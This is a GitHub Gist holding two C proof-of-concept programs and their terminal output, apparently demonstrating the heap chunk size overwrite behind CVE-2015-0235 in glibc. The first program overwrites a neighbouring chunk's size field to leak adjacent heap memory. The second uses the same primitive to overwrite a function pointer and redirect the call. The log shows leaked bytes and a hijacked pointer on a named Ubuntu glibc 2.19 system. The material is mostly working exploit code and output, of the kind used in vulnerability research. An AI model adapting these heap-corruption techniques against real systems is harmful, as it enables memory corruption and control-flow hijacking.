Last active
September 28, 2016 06:21
-
-
Save inaz2/05c5bfc65ff52946ebe2 to your computer and use it in GitHub Desktop.
CVE-2015-0235 heap chunk size overwrite / http://www.openwall.com/lists/oss-security/2015/01/27/9
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| #include <unistd.h> | |
| #include <stdlib.h> | |
| #include <string.h> | |
| int main() | |
| { | |
| /* preparation */ | |
| char *p1 = malloc(0x100); | |
| char *p2 = malloc(0x100); | |
| char *p3 = malloc(0x100); | |
| memset(p3, 'A', 0x100); | |
| free(p2); | |
| /* overwrite the size of next chunk */ | |
| memset(p1, 'B', 0x108); | |
| memcpy(p1+0x108, "\x01\x10\x00\x00\x00\x00\x00\x00", 8); | |
| /* read(0, p1, 0x110); */ | |
| /* split freed chunk */ | |
| char *p4 = malloc(0x100); | |
| /* read out buffer next to freed chunk */ | |
| write(1, p3, 0x100); | |
| return 0; | |
| } |
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| #include <unistd.h> | |
| #include <stdio.h> | |
| #include <stdlib.h> | |
| #include <string.h> | |
| void f() | |
| { | |
| puts("exiting..."); | |
| } | |
| int main() | |
| { | |
| /* preparation */ | |
| char *p1 = malloc(0x100); | |
| char *p2 = malloc(0x100); | |
| void (**p3)() = malloc(8); | |
| *p3 = f; | |
| free(p2); | |
| printf("[+] *p3 = %p\n", *p3); | |
| /* overwrite the size of next chunk */ | |
| memset(p1, 'A', 0x108); | |
| memcpy(p1+0x108, "\x01\x10\x00\x00\x00\x00\x00\x00", 8); | |
| /* read(0, p1, 0x110); */ | |
| /* allocate chunk for overwriting */ | |
| char *p4 = malloc(0x200); | |
| /* overwrite following chunks */ | |
| memset(p4, 'B', 0x200); | |
| /* read(0, p4, 0x200); */ | |
| /* trigger */ | |
| printf("[+] *p3 = %p\n", *p3); | |
| (*p3)(); | |
| return 0; | |
| } |
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| $ gcc infoleak.c | |
| $ ./a.out | xxd | |
| 0000000: b877 c15d 137f 0000 b877 c15d 137f 0000 .w.].....w.].... | |
| 0000010: 0000 0000 0000 0000 0000 0000 0000 0000 ................ | |
| 0000020: 4141 4141 4141 4141 4141 4141 4141 4141 AAAAAAAAAAAAAAAA | |
| 0000030: 4141 4141 4141 4141 4141 4141 4141 4141 AAAAAAAAAAAAAAAA | |
| 0000040: 4141 4141 4141 4141 4141 4141 4141 4141 AAAAAAAAAAAAAAAA | |
| 0000050: 4141 4141 4141 4141 4141 4141 4141 4141 AAAAAAAAAAAAAAAA | |
| 0000060: 4141 4141 4141 4141 4141 4141 4141 4141 AAAAAAAAAAAAAAAA | |
| 0000070: 4141 4141 4141 4141 4141 4141 4141 4141 AAAAAAAAAAAAAAAA | |
| 0000080: 4141 4141 4141 4141 4141 4141 4141 4141 AAAAAAAAAAAAAAAA | |
| 0000090: 4141 4141 4141 4141 4141 4141 4141 4141 AAAAAAAAAAAAAAAA | |
| 00000a0: 4141 4141 4141 4141 4141 4141 4141 4141 AAAAAAAAAAAAAAAA | |
| 00000b0: 4141 4141 4141 4141 4141 4141 4141 4141 AAAAAAAAAAAAAAAA | |
| 00000c0: 4141 4141 4141 4141 4141 4141 4141 4141 AAAAAAAAAAAAAAAA | |
| 00000d0: 4141 4141 4141 4141 4141 4141 4141 4141 AAAAAAAAAAAAAAAA | |
| 00000e0: 4141 4141 4141 4141 4141 4141 4141 4141 AAAAAAAAAAAAAAAA | |
| 00000f0: 4141 4141 4141 4141 4141 4141 4141 4141 AAAAAAAAAAAAAAAA | |
| $ gcc ptr_overwrite.c | |
| $ ./a.out | |
| [+] *p3 = 0x4006bd | |
| [+] *p3 = 0x4242424242424242 | |
| Segmentation fault (core dumped) | |
| $ uname -a | |
| Linux vm-ubuntu64 3.19.0-25-generic #26~14.04.1-Ubuntu SMP Fri Jul 24 21:16:20 UTC 2015 x86_64 x86_64 x86_64 GNU/Linux | |
| $ /lib/x86_64-linux-gnu/libc.so.6 | |
| GNU C Library (Ubuntu EGLIBC 2.19-0ubuntu6.9) stable release version 2.19, by Roland McGrath et al. | |
| Copyright (C) 2014 Free Software Foundation, Inc. | |
| This is free software; see the source for copying conditions. | |
| There is NO warranty; not even for MERCHANTABILITY or FITNESS FOR A | |
| PARTICULAR PURPOSE. | |
| Compiled by GNU CC version 4.8.4. | |
| Compiled on a Linux 3.13.11 system on 2016-05-26. | |
| Available extensions: | |
| crypt add-on version 2.1 by Michael Glad and others | |
| GNU Libidn by Simon Josefsson | |
| Native POSIX Threads Library by Ulrich Drepper et al | |
| BIND-8.2.3-T5B | |
| libc ABIs: UNIQUE IFUNC | |
| For bug reporting instructions, please see: | |
| <https://bugs.launchpad.net/ubuntu/+source/eglibc/+bugs>. |
Sign up for free
to join this conversation on GitHub.
Already have an account?
Sign in to comment